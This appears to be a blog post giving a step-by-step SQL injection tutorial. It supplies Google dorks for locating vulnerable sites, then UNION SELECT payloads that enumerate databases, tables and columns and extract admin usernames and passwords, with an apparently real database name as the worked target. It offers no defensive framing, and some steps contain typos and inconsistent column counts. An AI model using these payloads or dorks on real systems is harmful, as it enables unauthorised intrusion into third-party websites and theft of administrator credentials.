SQL injection

SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.Need to find out a sql vulnerable site : To find a sql vulnerable website we will use some google Dorks from following:

inurl:index.php?id=   inurl:trainers.php?id=  inurl:buy.php?category=  inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:Pageid=

Step 1: Finding Vulnerable Link –

http://www.site.com/news.php?id=3

Add ‘ After id=3

If SQL Syntax Error is shown or blank page then site is Vulnerable to SQL Injection.

Step 2: Finding Vulnerable Columns –

http://www.site.com/news.php?id=3

order by 8 —

if again error is shown or blank page occured then

Vulnerable columns are 7.

Step 3: Finding Number of Vulnerable Columns:

http://www.site.com/news.php?id=3

union all select 1,2,3,4,5,6,7 —

if number 2 is shown then this column can give us database,tables & columns

Step 4 Finding Database

union all select 1,database(),3,4,5,6,7 —

chennaisilks

Step 5: Finding Table Names:

http://www.site.com/news.php?id=3

union all select 1,table_name,3,4,5,6 from  information_schema.tables wheretable_schema=’chennaisilks’ —

Step 6: Finding Column Names:

http://www.site.com/news/php?id=3

union all select 1,column_name,3,4,5,6,7

from information_schema.columns where

table_schema=’chennaisilks’ —

Admin table is admin

Admin Columns are

admin_id

user_id

admin_pwd

admin_email

admin_last_login

admin_ip

Step 6: Finding Admin username & password:

http://www.site.com/news.php?id=3

union all select 1,user_id,3,4,5,6,7 from admin —

union all select 1,admin_pwd,3,4,5,6,7 from admin —

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: